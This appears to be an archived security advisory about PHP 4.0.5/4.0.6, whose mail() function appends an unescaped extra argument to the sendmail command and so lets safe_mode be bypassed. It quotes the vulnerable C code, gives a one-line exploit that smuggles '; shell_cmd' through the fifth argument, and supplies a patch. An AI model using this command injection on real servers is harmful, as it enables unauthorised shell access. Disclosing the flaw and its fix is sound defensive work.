COMMAND

    php

SYSTEMS AFFECTED

    php 4.0.5, 4.0.6

PROBLEM

    Laurent Sintes posted following.  php mail() function does not  do
    check  for  escape  shell  commandes,  even  if  php is running in
    safe_mode.   So  it's  may  be  possible  to  bypass the safe_mode
    restriction and gain shell access.

    Significatives lines of ext/standard/mail.c:

        extra_cmd = (*argv[4])->value.str.val;
        strcat (sendmail_cmd, extra_cmd);
        sendmail = popen(sendmail_cmd, "w");

    Exploit:

    mail("toto@toto.com",
             "test",
             "test",
             "test",
            "; shell_cmd");

SOLUTION

    Salim Gasmi  sent following  very trivial  patch if  like him  you
    cannot disable the mail() function.  Add this line:

        extra_cmd=NULL;

    in file ext/standard/mail.c, (line #152, juste before

        if (extra_cmd != NULL) { )

    and recompile  php.   This will  force the  parameter extra_cmd to
    NULL and thus disabling the bug.

    This is a  fast and trivial  patch, the right  way is to  unescape
    all characters in extra_cmd.